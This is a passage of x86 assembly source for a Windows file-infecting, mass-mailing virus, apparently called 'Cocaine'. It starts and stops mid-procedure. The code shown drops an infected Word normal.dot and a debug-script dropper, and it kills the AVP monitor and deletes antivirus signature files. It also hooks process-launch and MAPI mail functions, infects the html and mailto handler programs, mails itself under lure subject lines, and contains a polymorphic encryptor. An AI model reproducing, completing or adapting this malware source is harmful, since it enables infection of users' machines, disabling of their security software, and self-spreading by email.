mov [ebp+(ofs dbgscript_size-ofs vcode)], edi
push 00000040h
push 00002000h+00001000h+00100000h
push 4*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
lea eax, [ebp+(ofs macros-ofs vcode)]
push eax
push macro_size
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax
lea eax, [ebp+(ofs macro_sized-ofs vcode)]
push eax
call lzrw1_decompress ;unpack normaldot
mov ecx, [ebp+(ofs macro_sized-ofs vcode)]
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
lea edi, [esi+ecx+4] ;edi=buffer for vars
mov [ebp+(ofs variables-ofs vcode)], edi
mov ebx, edi
@@9:
lodsb
cmp al, 'A'
jb @@10
cmp al, 'Z'
ja @@10
call random_f
jc @@10
sub al, 'A'-'a'
@@10:
mov [esi-1], al
loop @@9
mov ecx, 10 ;generate variables
@@13:
push ecx
mov eax, 8 ;lenght of the name of variable
call random
inc eax
inc eax
mov ecx, eax
@@12:
mov eax, 'Z'-'A'
call random
add al, 'A'
call random_f
jc @@11
sub al, 'A'-'a'
@@11:
stosb
loop @@12
sub eax, eax
stosb
pop ecx
loop @@13 ;next variable
push 00000040h
push 00002000h+00001000h+00100000h
push 4*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
push eax
mov edi, eax
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
@@14:
lodsb
cmp al, '%'
jne @@18
lodsb
sub al, '0'
push ebx
push esi
movzx ecx, al
mov esi, ebx
@@15:
lodsb
test al, al
jnz @@15
loop @@15
@@16:
lodsb
test al, al
jz @@17
stosb
jmp @@16
@@17:
pop esi
pop ebx
mov al, 12h
org $-1
@@18:
stosb
lea eax, [ebx-4]
cmp esi, eax
jb @@14
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free mem macro code (unprocess)
mov ecx, edi
pop esi
sub ecx, esi
push ecx
mov [ebp+(ofs mm_on_off-ofs vcode)], esi
push 00000040h
push 00002000h+00001000h+00100000h
push 150*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
sub ecx, ecx
sub ebx, ebx
mov edi, eax
xchg eax, [esp]
xchg eax, ecx
add ecx, [ebp+(ofs mm_on_off-ofs vcode)];ecx=limit of macro template
mov by [ebp+(ofs mdeep-ofs vcode)], -1
@@19:
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
inc ah
cmp ah, 2
jne @@20
mov by [ebp+(ofs mdeep-ofs vcode)], 0
@@20:
cmp ah, 8
jne @@21
mov by [ebp+(ofs mdeep-ofs vcode)], -1
@@21:
cmp ah, 6
jne @@22
mov esi, [ebp+(ofs dbgscript-ofs vcode)]
push ecx
mov ecx, [ebp+(ofs dbgscript_size-ofs vcode)]
rep movsb
pop ecx
call MacroGarble
jmp @@19
@@22:
cmp ah, 9
je @@28
@@23:
cmp esi, ecx
jb @@24 ;all buffer scanned?
test ebx, ebx
jz @@19 ;nothing we was searching exists
mov esi, [ebp+(ofs mm_on_off-ofs vcode)];it exists, but we skipped!
sub ebx, ebx
@@24:
lodsb
cmp al, ah
jne @@27 ;find line we're searching
inc ebx ;flag found
push eax
mov ax, 100
call random
cmp eax, 33 ;1/3
pop eax
jnb @@27 ;skip this time
mov by [esi-1], 9 ;flag as done
@@25:
lodsb
test al, al
jz @@26
stosb
cmp al, 10
jne @@25
call MacroGarble ;after CRLF, insert garbage
jmp @@25
@@26:
jmp @@23
@@27:
lodsb
test al, al
jnz @@27 ;seek till next line
jmp @@23
@@28:
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from macro code
mov eax, [esp] ;get buffer from stack
push eax
sub edi, eax
push edi
lea eax, [ebp+(ofs cokefile-ofs vcode)]
push eax
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
call WriteDump ;create/write new normal.dot
pop eax ;buffer
push 00004000h+00008000h
push 0
push eax
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from complete code
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs dbgscript-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from debug script
@@0:
sub ecx, ecx
pop dwo fs:[ecx]
pop ecx
sub eax, eax
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], eax
add al, '0'
mov by [ebp+(ofs dmt1-ofs vcode)], al
mov by [ebp+(ofs dmt2-ofs vcode)+7], al
mov by [ebp+(ofs outcmd-ofs vcode)+7], al
mov by [ebp+(ofs ssize-ofs vcode)+7], al
mov by [ebp+(ofs coda-ofs vcode)+7], al
mov by [ebp+(ofs dmt3-ofs vcode)+7], al
mov by [ebp+(ofs dmt4-ofs vcode)+7], al
mov by [ebp+(ofs dmt5-ofs vcode)+7], al
ret
MacroSpread endp
MacroGarble proc
push eax
push ecx
push esi
cmp by [ebp+(ofs mdeep-ofs vcode)], MAX_M_DEEP
jae @@0
inc by [ebp+(ofs mdeep-ofs vcode)]
mov eax, 4
call random
add eax, 2
mov ecx, eax
@@1:
push ecx
@@2:
mov eax, 16
call random
cmp al, 10
je @@remark
cmp al, 11
je @@for
cmp al, 12
je @@variables
cmp al, 13
je @@if
cmp al, 14
je @@10
jmp @@2
@@if:
mov eax, ' fI'
stosd
dec edi
call MakeVar
mov eax, ' = '
call random_f
jc @@3
dec ah
call random_f
jc @@3
inc ah
inc ah
@@3:
stosd
dec edi
call MakeVar
mov eax, 'ehT '
stosd
mov eax, 000a0d00h+'n'
stosd
dec edi
call MacroGarble
call @@4
db 'End If', 13, 10
@@4:
pop esi
movsd
movsd
jmp @@10
@@remark:
call random_f
jc @@5
mov al, "'"
stosb
jmp @@6
@@5:
mov eax, ' meR'
stosd
@@6:
call MakeVar
call MakeVar
@@7:
mov ax, 0a0dh
stosw
jmp @@10
@@variables:
call MakeVar
call random_f
jc @@string
mov eax, ' = '
stosd
dec edi
call MakeNumber
@@8:
jmp @@7
@@string:
call MakeVar
mov eax, ' = $'
stosd
mov al, '"'
stosb
call MakeVar
mov al, '"'
stosb
jmp @@8
@@for:
mov eax, ' roF'
stosd
push edi
call MakeVar
mov eax, ' = '
stosd
dec edi
call MakeNumber
mov eax, ' oT '
stosd
call MakeNumber
mov ax, 0a0dh
stosw
call MacroGarble
mov eax, 'txeN'
stosd
mov al, ' '
stosb
pop esi
@@9:
lodsb
cmp al, ' '
je @@8
stosb
jmp @@9
@@10:
pop ecx
dec ecx
jnz @@1
dec by [ebp+(ofs mdeep-ofs vcode)]
@@0:
pop esi
pop ecx
pop eax
ret
MacroGarble endp
MakeNumber proc
push ecx
push eax
mov eax, 2
call random
inc eax
mov ecx, eax
@@1:
mov eax, '9'-'0'
call random
add al, '0'
stosb
loop @@1
pop eax
pop ecx
ret
MakeNumber endp
include lz.inc
include macro.inc
update_address proc
push eax ecx
db 0b8h
addr dd 0 ;get address to eax
mov ecx, 4
@@1:
rol ax, 4
call mhex ;print hex digits
loop @@1
add dwo [ebp+(ofs addr-ofs vcode)], 10h ;update address
pop ecx eax
ret
update_address endp
mhex proc
push eax ebx
and eax, 01111b ;lower nibble
call $+21
db '0123456789ABCDEF'
pop ebx
xlat ;turn it in hex digit
stosb
pop ebx eax
ret
mhex endp
copy_line proc
push eax
@@0:
lodsb
or al, al
jz @@1 ;zero found, stop copy
stosb
jmp @@0
@@1:
pop eax
ret
copy_line endp
make_hex proc
push eax ecx esi
db 0b8h+6
iaddr dd 0 ;esi<->actual buffer position
inc dwo [ebp+(ofs iaddr-ofs vcode)] ;set next
mov al, 20h
stosb ;print space
lodsb
rol al, 4
call mhex ;print upper nibble
rol al, 4
call mhex ;print lower nibble
pop esi ecx eax
loop make_hex
ret
make_hex endp
script proc
cld
call debugmutator
mov dwo [ebp+(ofs addr-ofs vcode)], 0100h
mov [ebp+(ofs iaddr-ofs vcode)], esi ;set vars
lea esi, [ebp+(ofs intro-ofs vcode)]
call copy_line ;copy intro code
mov eax, 16
cdq
xchg eax, ecx
div ecx ;ecx=number of 16-bytes lines
mov ecx, eax ;edx=remainder for last line
@@0:
push ecx
lea esi, [ebp+(ofs outcmd-ofs vcode)]
call copy_line ;print
call update_address ;address
mov ecx, 16
call make_hex ;code to assemble
mov eax, 000A0D00h+'"'
stosd ;next line
dec edi
pop ecx
loop @@0
mov ecx, edx
jecxz @@1 ;no remainder?
lea esi, [ebp+(ofs outcmd-ofs vcode)]
call copy_line
call update_address ;make last line
call make_hex
mov eax, 000A0D00h+'"'
stosd
dec edi
sub wo [ebp+(ofs addr-ofs vcode)], 10h ;undo damage
@@1:
lea esi, [ebp+(ofs ssize-ofs vcode)]
call copy_line ;rcx
add wo [ebp+(ofs addr-ofs vcode)], dx
sub wo [ebp+(ofs addr-ofs vcode)], 100h
lea esi, [ebp+(ofs ssize-ofs vcode)]
call copy_line ;optimization!
sub edi, 6
call update_address ;set size
mov eax, 000A0D00h+'"'
stosd
dec edi
lea esi, [ebp+(ofs coda-ofs vcode)] ;copy final shit
call copy_line
ret
script endp
dbgscript dd 0
dbgscript_size dd 0
intro db 'Open "C:\COCAINE.SRC" For OutPut As '
dmt1 db '0', 13, 10
dmt2 db 'Print #0, "N C:\W32COKE.EX"',13,10,0
outcmd db 'Print #0, "E ',0
ssize db 'Print #0, "RCX"', 13, 10, 0
coda db 'Print #0, "W"', 13, 10
dmt3 db 'Print #0, "Q"', 13, 10
dmt4 db 'Print #0, ""', 13, 10
dmt5 db 'Close #0', 13, 10, 0
debugmutator proc
pushad
mov eax, 9
call random
inc eax
add by [ebp+(ofs dmt1-ofs vcode)], al
add by [ebp+(ofs dmt2-ofs vcode)+7], al
add by [ebp+(ofs outcmd-ofs vcode)+7], al
add by [ebp+(ofs ssize-ofs vcode)+7], al
add by [ebp+(ofs coda-ofs vcode)+7], al
add by [ebp+(ofs dmt3-ofs vcode)+7], al
add by [ebp+(ofs dmt4-ofs vcode)+7], al
add by [ebp+(ofs dmt5-ofs vcode)+7], al
popad
ret
debugmutator endp
macro_end equ this byte
MakeVar proc
push ecx
push eax
mov eax, 5
call random
add eax, 4
mov ecx, eax
@@1:
mov al, 'Z'-'A'
call random
add al, 'A'
call random_f
jc @@2
sub al, 'A'-'a'
@@2:
stosb
push ecx
push edi
call @@3
db 'AaEeIiOoUu'
@@3:
pop edi
mov ecx, 10
repne scasb
jecxz @@4
dec dwo [esp-1]
@@4:
pop edi
pop ecx
loop @@1
stosb
pop eax
pop ecx
ret
MakeVar endp
PatchIT proc
push esi
lea edi, [esi+ecx] ;destination
mov ecx, 4
push eax
mov esi, esp ;fake buffer in stack
call WriteMem
pop esi ;remove shit
pop esi
ret
PatchIT endp
_base dd 400000h
NUM_TOPICS EQU 8
topics equ this byte
dd ofs t0-ofs vcode
dd ofs t0-ofs vcode
dd ofs t0-ofs vcode
dd ofs t1-ofs vcode
dd ofs t2-ofs vcode
dd ofs t3-ofs vcode
dd ofs t4-ofs vcode
dd ofs t5-ofs vcode
t0 db '', 0
t1 db 'Kewl page!', 0
t2 db 'Improvement to your page', 0
t3 db 'Your page r0x0r!', 0
t4 db 'You must see this...', 0
t5 db 'Secret stuff!', 0
;ESI=Code to encript (Big enought; Swappable)
;EDI=Place to put code (Big enought; Swappable)
;ECX=Size of code to encript
;EAX=Delta entrypoint
;EDX=VA where code will run in host
;
;EDI=Final buffer
;ECX=Size
;EAX=New delta entrypoint
mutate proc
cld
push eax
call crypt_poly ;decript engine
mov [ebp+(ofs rva-ofs vcode)], edx
call random0
mov [ebp+(ofs cp_key-ofs vcode)], al ;next memory key
mov eax, [ebp+(ofs seed-ofs vcode)]
mov [ebp+(ofs pseed-ofs vcode)], eax
mov eax, 3
call random
push 2
pop ebx
add ebx, eax
or bl, 1
pop eax
@@1:
push ebx
call poly
xchg esi, edi ;permute bufferz
pop ebx
dec ebx
jnz @@1 ;next loop
xchg esi, edi
call crypt_poly ;encript poly engine after use
ret
mutate endp
crypt_poly proc
pushad
mov al, by [ebp+(ofs cp_key-ofs vcode)]
mov ecx, ofs egtable-ofs poly
lea esi, [ebp+(ofs poly-ofs vcode)]
@@1:
xor by [esi], al
inc esi
loop @@1
popad
ret
crypt_poly endp
rbuf db MAX_BRANCH*(128+4+4) dup (0)
vinit proc
mov esp, [esp+8]
call delta
lea eax, [ebp+(ofs seh-ofs vcode)]
mov [esp-4], eax
call init ;get api entries
jc @@3
sub eax, eax
mov ecx, MAX_SOCK+1
lea edi, [ebp+(ofs _socket-ofs vcode)]
rep stosd
mov [ebp+(ofs email_w-ofs vcode)], eax
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
mov [ebp+(ofs mdeep-ofs vcode)], al
lea eax, [ebp+(ofs kernel-ofs vcode)]
push eax
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
mov [ebp+(ofs K32-ofs vcode)], eax ;save kernel32 base
lea esi, [ebp+(ofs k32_names-ofs vcode)]
lea edi, [ebp+(ofs k32_address-ofs vcode)]
@@1:
lodsd
or eax, eax
jz @@2
add eax, ebp
call gpa_kernel32 ;get all api we want from k32
jc @@3
stosd
jmp @@1
db 0b9h
@@2:
lea eax, [ebp+(ofs user-ofs vcode)]
push eax
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
mov [ebp+(ofs U32-ofs vcode)], eax ;save user base
@@4:
lodsd
or eax, eax
jz @@5
mov ebx, [ebp+(ofs U32-ofs vcode)]
add eax, ebp
call gpa_custom ;get all api we want again
jc @@3
stosd
jmp @@4
db 0eah
@@5:
call @@adf
db 'ADVAPI32',0
@@adf:
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
call @@a11
db 'RegSetValueExA', 0
@@a11:
push eax
call @@aaa
db 'RegCreateKeyExA', 0
@@aaa:
push eax
call @@baa
db 'RegOpenKeyExA', 0
@@baa:
push eax
call @@caa
db 'RegQueryValueExA', 0
@@caa:
push eax
call @@d
db 'RegCloseKey', 0
@@d:
push eax ;retrieve all needed APIs
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegCloseKey-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegQueryValueEx-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegOpenKeyEx-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegCreateKeyEx-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegSetValueEx-ofs vcode)], eax
lea eax, [ebp+(ofs wavp-ofs vcode)]
sub ecx, ecx
push eax
push ecx
call [ebp+(ofs _FindWindowA-ofs vcode)]
or eax,eax
jz @@b
push ecx ;terminate AVPM using vg scheme
push ecx
push 16
push eax
call [ebp+(ofs _PostMessageA-ofs vcode)]
@@b:
lea eax, [ebp+(ofs shitfile-ofs vcode)]
push eax
call DeleteShitFile
call @@a1
db 'KERNEL.AVC', 0
@@a1:
call DeleteShitFile
call @@a2
db 'SIGN.DEF', 0
@@a2:
call DeleteShitFile
call @@a3
db 'FIND.DRV', 0
@@a3:
call DeleteShitFile
call @@a4
db 'NOD32.000', 0
@@a4:
call DeleteShitFile
call @@a5
db 'DSAVIO32.DLL', 0
@@a5:
call DeleteShitFile
call @@a6
db 'SCAN.DAT', 0
@@a6:
call DeleteShitFile
call @@a7
db 'VIRSCAN.DAT', 0
@@a7:
call DeleteShitFile
call @@a8
db 'C:\COCAINE.SRC', 0
@@a8:
call DeleteShitFile
lea ebx, [ebp+(ofs ancevsys-ofs vcode)]
push 83h
push ebx
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
lea esi, [ebp+(ofs current_time-ofs vcode)]
push esi
call [ebp+(ofs _GetSystemTime-ofs vcode)]
lea edi, [ebp+(ofs seed-ofs vcode)]
sub eax, eax
lodsw
lodsw ;init seed with dayofweek/day
movsd
push eax
sub al, MONTH_DELAY ;enougth time passed?
jnc @@6
add al, 12
@@6:
cmp by [ebp+(ofs FunDate-ofs vcode)], al
mov al, 90h
je @@7
add al, 0c3h-90h ;nop/ret flip
@@7:
mov by [ebp+(ofs Payload-ofs vcode)], al
pop eax
add al, MONTH_DELAY
aam 12 ;set trigger date
mov by [ebp+(ofs FunDate-ofs vcode)], al
call random0
mov [ebp+(ofs key1-ofs vcode)], eax
call random0
mov [ebp+(ofs key2-ofs vcode)], eax
call macro_crypt ;decript macro stuff
call MacroSpread
call random0
add by [ebp+(ofs macro_key-ofs vcode)], al
call macro_crypt ;encript macro stuff
lea edx, [ebp+(ofs directory-ofs vcode)]
push edx
push MAX_PATH
call [ebp+(ofs _GetCurrentDirectoryA-ofs vcode)]
test eax, eax
jz @@10
call ProcessDir
@@10:
IF DIRECT EQ TRUE
lea edx, [ebp+(ofs directory-ofs vcode)]
push MAX_PATH
push edx
call [ebp+(ofs _GetWindowsDirectoryA-ofs vcode)]
test eax, eax
jz @@11
call ProcessDir
@@11:
; lea edx, [ebp+(ofs directory-ofs vcode)]
; push MAX_PATH
; push edx
; call [ebp+(ofs _GetSystemDirectoryA-ofs vcode)]
; test eax, eax
; jz @@12
; call ProcessDir
; @@12:
ENDIF
mov esi, [ebp+(ofs _base-ofs vcode)]
@@a:
lea eax, [ebp+(ofs NewWinExec-ofs vcode)]
mov ecx, 0 ;hook per-process functionz
OldWinExec equ dwo $-4
jecxz @@8
call PatchIT
@@8:
lea eax, [ebp+(ofs NewCreateProcessA-ofs vcode)]
mov ecx, 0
OldCreateProcessA equ dwo $-4
jecxz @@9
call PatchIT
@@9:
lea eax, [ebp+(ofs NewMAPISendMail-ofs vcode)]
mov ecx, 0
OldMAPISendMail equ dwo $-4
jecxz @@92
call PatchIT
@@92:
lea eax, [ebp+(ofs NewGetProcAddress-ofs vcode)]
mov ecx, 0
OldGetProcAddress equ dwo $-4
jecxz @@93
call PatchIT
@@93:
call Payload
@@3:
call delta
cmp by [ebp+(ofs RestoreChunkz-ofs vcode)], FALSE
je @@aa
mov edx, MAX_BRANCH
lea esi, [ebp+(ofs rbuf-ofs vcode)]
@@rc1:
lodsd
add eax, [ebp+(ofs _base-ofs vcode)]
mov edi, eax
lodsd
mov ecx, eax
pushad
call WriteMem
popad
lea esi, [esi+ecx]
dec edx
jnz @@rc1
@@aa:
mov eax, 365
call random
cmp ax, 24
jne @sajsj
call GetList
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call DeleteShitFile
@sajsj:
call OpenAncev
jc @@jdjd
lea eax, [ebp+(ofs cokefile-ofs vcode)]
push eax
call DeleteShitFile
@@jdjd:
mov eax, NUM_TOPICS
call random
mov eax, [ebp+(ofs topics-ofs vcode)+(eax*4)]
add eax, ebp
mov [ebp+(ofs subject-ofs vcode)], eax
IF DIRECT EQ TRUE
inc dwo [ebp+(ofs what_key-ofs vcode)]
call @@2323
db 'SOFTWARE\Classes\htmlfile\shell\open\command', 0
@@2323:
pop eax
call ConsultKey
call FixKey
sub eax, eax
mov dwo [ebp+(ofs fsizel-ofs vcode)], eax
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], eax
call Infect
call @@2324
db 'SOFTWARE\Classes\mailto\shell\open\command', 0
@@2324:
pop eax
call ConsultKey
call FixKey
sub eax, eax
mov dwo [ebp+(ofs fsizel-ofs vcode)], eax
call Infect
dec dwo [ebp+(ofs what_key-ofs vcode)]
ENDIF
sub eax, eax
lea esi, [ebp+(ofs thread-ofs vcode)]
push esi
push eax
push ebp
lea esi, [ebp+(ofs MailThread-ofs vcode)]
push esi
push eax
push eax
call [ebp+(ofs _CreateThread-ofs vcode)]
call http_install
ret2host:
pop dwo fs:[0] ;restore seh frame
pop eax
jmp host ;jmp to host
vinit endp
host_entry equ dwo $-4
seh:
mov esp, [esp+8]
jmp ret2host
FixKey proc
push -2
pop ecx
mov edi, esi
@@0:
lodsb
cmp al, '"'
je @@1
test al, al
jz @@2
cmp al, ' '
jne @@3
cmp ecx, -2
je @@2
@@3:
stosb
jmp @@0
@@1:
inc ecx
jecxz @@2
jmp @@0
@@2:
sub eax, eax
stosb
ret
FixKey endp
cokefile db 'C:\COCAINE.SYS', 0
init proc
mov ecx, esp
call @@3
mov esp, [esp+8] ;fix stack
@@1:
call delta
stc ;signal error
mov cl, ?
org $-1
@@2:
clc ;signal sucess
pop dwo fs:[0] ;restore seh frame
sahf
add esp, 4
lahf
ret
db 081h
@@3:
sub eax, eax
push dwo fs:[eax]
mov fs:[eax], esp ;set new seh frame
mov eax, 0 ;is GetModuleHandleA imported?
OldGetModuleHandleA equ dwo $-4
test eax, eax
jz @@5
add eax, [ebp+(ofs _base-ofs vcode)]
lea edx, [ebp+(ofs kernel-ofs vcode)]
push edx
call [eax] ;use imported API to get
test eax, eax ;kernel32 module
jz @@5
mov edx, eax
jmp @@4
@@5:
mov eax, 077f00000h ;wNT base
push eax
call check_base
pop edx
jz @@4
mov eax, 077e00000h ;wNT 5 base
push eax
call check_base
pop edx
jz @@4
mov eax, 0bff70000h ;w9x base
push eax
call check_base
pop edx
jnz @@1
@@4:
mov eax, edx
mov ebx, eax
call delta
add eax, [eax+3ch]
cmp dwo [eax], 'EP'
jne @@1
add ebx, [eax+120] ;export table
lea eax, [ebp+(ofs sGetModuleHandle-ofs vcode)]
mov dwo [ebp+(ofs size_search-ofs vcode)], 17
mov [ebp+(ofs string_search-ofs vcode)], eax
call search_et ;get GetModuleHandle
jc @@1
mov [ebp+(ofs _GetModuleHandle-ofs vcode)], eax
lea eax, [ebp+(ofs sGetProcAddress-ofs vcode)]
mov dwo [ebp+(ofs size_search-ofs vcode)], 15
mov [ebp+(ofs string_search-ofs vcode)], eax
call search_et ;get GetProcAddress
jc @@1
mov [ebp+(ofs _GetProcAddress-ofs vcode)], eax
jmp @@2
init endp
check_base proc
call @@1
mov esp, [esp+8]
call delta
cmp eax, esp
jmp @@0
@@1:
push dwo fs:[0]
mov fs:[0], esp
cmp wo [eax], 'ZM'
@@0:
pop dwo fs:[0]
pop eax
ret
check_base endp
search_et proc
mov eax, [ebx+32]
add eax, edx ;name table ptr
@@1:
mov esi, [eax]
or esi, esi
jz @@3 ;nul ptr
add esi, edx
mov edi, 0
string_search equ dwo $-4
mov ecx, 0
size_search equ dwo $-4
rep cmpsb ;the one we search?
jz @@2
add eax, 4
jmp @@1 ;check next api
@@2:
sub eax, [ebx+32]
sub eax, edx
shr eax, 1 ;div by 2
add eax, [ebx+36]
add eax, edx
movzx eax, wo [eax]
shl eax, 2 ;mul by 4
add eax, [ebx+28]
add eax, edx
mov eax, [eax]
add eax, edx
clc ;signal sucess
mov cl, 12h
org $-1
@@3:
stc ;signal error
ret
search_et endp
gpa_custom proc
push eax ;pointer to api wanted
push ebx ;module handle
jmp _gpa
db 66h
gpa_kernel32 proc
push eax
push dwo [ebp+(ofs K32-ofs vcode)]
_gpa:
call [ebp+(ofs _GetProcAddress-ofs vcode)]
or eax, eax
jz @@1
clc
mov cl, 12h
org $-1
@@1:
stc
ret
gpa_kernel32 endp
gpa_custom endp
MAX_RECURSION = 3
JMP_MAX = 16
MAX_SUBROUTINES = 16
flg record{
_key:1, ;1key isnt necessary ;4
_encriptor:2 ;XOR = 00
;NOT = 01
;ADD = 10
;SUB = 11 ;23
_bwd_fwd:1, ;0inc/1dec counter ;1
_direction:1, ;1backward/0forward ;0
}
pushf
db 09ah
poly proc ;encripted in memory!
push esi
mov [ebp+(ofs entry-ofs vcode)], eax
mov [ebp+(ofs buffer-ofs vcode)], edi
mov [ebp+(ofs _size-ofs vcode)], ecx ;save entry values
sub eax, eax
mov [ebp+(ofs reg32-ofs vcode)], eax
mov [ebp+(ofs recurse-ofs vcode)], eax ;init internal vars
mov [ebp+(ofs lparm-ofs vcode)], eax
mov [ebp+(ofs lvars-ofs vcode)], eax
mov [ebp+(ofs subs_index-ofs vcode)], eax
mov [ebp+(ofs s_into-ofs vcode)], eax ;(dword)
call random0
and eax, mask _bwd_fwd + mask _direction + mask _encriptor
mov [ebp+(ofs flagz-ofs vcode)], eax ;set engine flagz
mov edx, eax
and edx, 11b
call random0
mov [ebp+(ofs key-ofs vcode)], al ;choose key
lea ebx, [ebp+(ofs crypt_table-ofs vcode)]
test edx, 10b
jz @@0
add ebx, 6 ;next table
@@0:
test edx, 01b
jz @@1
add ebx, 3 ;second choice
@@1:
mov ax, wo [ebx]
mov [ebp+(ofs _dec-ofs vcode)], ax
mov al, by [ebx+2]
mov [ebp+(ofs _enc-ofs vcode)], al
dec edx
jnz @@2
mov by [ebp+(ofs key-ofs vcode)], 0D0h ;not dont use key
bts dwo [ebp+(ofs flagz-ofs vcode)], 6 ;(mask _key)
@@2:
jmp @@3 ;flush piq
@@3:
lodsb
_enc db 00
key db 00
stosb
loop @@3 ;crypt code
mov eax, 64
call random
mov ecx, eax
call _shit
mov [ebp+(ofs decriptor-ofs vcode)], edi;here the decriptor start
call garble ;start of decriptor
lea ebx, [ebp+(ofs make_counter-ofs vcode)]
lea edx, [ebp+(ofs make_pointer-ofs vcode)]
call swapper ;setup start of poly decriptor
push edi ;loop start here
call garble
mov eax, [ebp+(ofs _dec-ofs vcode)]
mov edx, [ebp+(ofs p_reg-ofs vcode)]
or ah, dl
stosw ;store crypt instr
bt dwo [ebp+(ofs flagz-ofs vcode)], 6 ;(mask _key)
jc @@4
mov al, by [ebp+(ofs key-ofs vcode)]
stosb ;store key
@@4:
call garble
lea ebx, [ebp+(ofs upd_counter-ofs vcode)]
lea edx, [ebp+(ofs upd_pointer-ofs vcode)]
call swapper ;update counter and pointer
mov edx, [ebp+(ofs c_reg-ofs vcode)]
call random
jc @@5
call random
js @@7
mov eax, 0c00bh ;or reg, reg
jmp @@8
@@7:
mov eax, 0c085h ;test reg, reg
@@8:
mov ecx, edx
shl edx, 3
or ah, dl
or ah, cl
stosw
jmp @@6
@@5:
mov eax, 0f883h
or ah, dl
stosw ;cmp reg, 0
sub eax, eax
stosb
@@6:
mov ax, 850fh ;do conditional jump
stosw
pop edx
sub edx, edi ;delta distance
sub edx, 4
mov eax, edx
stosd ;jnz start_of_loop
mov dwo [ebp+(ofs reg32-ofs vcode)], 0
call garble
mov al, 0e9h
stosb ;jmp start
mov eax, edi
sub eax, [ebp+(ofs buffer-ofs vcode)]
sub eax, [ebp+(ofs entry-ofs vcode)]
add eax, 4
neg eax
stosd
call garble
call garble
mov ecx, [ebp+(ofs buffer-ofs vcode)] ;(this allow the calls be
sub edi, ecx ;forward/backward direction)
xchg edi, ecx
mov eax, [ebp+(ofs decriptor-ofs vcode)];calculate new entrypoint
sub eax, [ebp+(ofs buffer-ofs vcode)] ;relative to previous rva
pop esi
ret
poly endp
gar proc
call random0 ;get any reg
and eax, 0111b
cmp al, 4 ;esp never
je gar
ret
gar endp
get8free proc
mov eax, [ebp+(ofs reg32-ofs vcode)]
and eax, 01111b
cmp eax, 01111b
jne @@1
stc
ret
@@1:
call random0
and eax, 011b
bt [ebp+(ofs reg32-ofs vcode)], eax ;al,cl,dl,bl
jc get8free
call random_f
jc @@2
or al, 0100b ;ah,ch,dh,bh
@@2:
ret
get8free endp
get32reg proc ;get a free 32bit reg
call gar ;and mark it as used
bts [ebp+(ofs reg32-ofs vcode)], eax
jc get32reg
ret
get32reg endp
get32free proc ;get a free 32bit reg
call gar ;and NOT mark it as used
bt [ebp+(ofs reg32-ofs vcode)], eax
jc get32free
ret
get32free endp
swapper proc
call random0
jc @@1
xchg edx, ebx ;change order
@@1:
push edx
call ebx ;call 1th
call garble
pop edx
call edx ;call 2th
call garble
ret
swapper endp
make_counter proc
call get32reg
mov [ebp+(ofs c_reg-ofs vcode)], eax
cmp al, 5 ;ebp complicate methodz
jne @@2
btr [ebp+(ofs reg32-ofs vcode)], eax ;free ebp
jmp make_counter
@@2:
or al, 0b8h
stosb
mov eax, [ebp+(ofs _size-ofs vcode)]
test dwo [ebp+(ofs flagz-ofs vcode)], mask _bwd_fwd
jnz @@1
neg eax ;counter will be INCed
@@1:
stosd
ret
make_counter endp
make_pointer proc
call get32reg
cmp al, 5 ;ebp complicate methodz
jne @@1
btr [ebp+(ofs reg32-ofs vcode)], eax ;free ebp
jmp make_pointer
@@1:
mov [ebp+(ofs p_reg-ofs vcode)], eax
or al, 0b8h
stosb
mov eax, [ebp+(ofs rva-ofs vcode)]
test dwo [ebp+(ofs flagz-ofs vcode)], mask _direction
jz @@2
add eax, dwo [ebp+(ofs _size-ofs vcode)];pointer will be DECced
dec eax
@@2:
stosd
ret
make_pointer endp
upd_pointer:
mov eax, [ebp+(ofs p_reg-ofs vcode)]
test dwo [ebp+(ofs flagz-ofs vcode)], mask _direction
jmp _update_reg
upd_counter:
mov eax, [ebp+(ofs c_reg-ofs vcode)]
test dwo [ebp+(ofs flagz-ofs vcode)], mask _bwd_fwd
_update_reg proc ;z=inc/nz=dec
mov ebx, 0140h ;inc
mov edx, 0c083h ;add
jz @@0
xor edx, 0c083h xor 0e883h ;sub
mov bl, 48h ;dec
@@0:
push eax
mov eax, 3
call random
or eax, eax
jz @@2 ;choose method
dec eax
jz @@1
xor edx, 0c083h xor 0e883h ;sub<->add
neg bh ;neg(1)
@@1:
pop ecx
mov eax, edx
or ah, cl ;patch reg
stosw
movzx eax, bh ;signal
jmp @@3
@@2:
pop ecx
xchg eax, ebx
or al, cl ;patch reg
@@3:
stosb
ret
_update_reg endp
garble proc
pushad
inc by [ebp+(ofs recurse-ofs vcode)]
cmp by [ebp+(ofs recurse-ofs vcode)], MAX_RECURSION
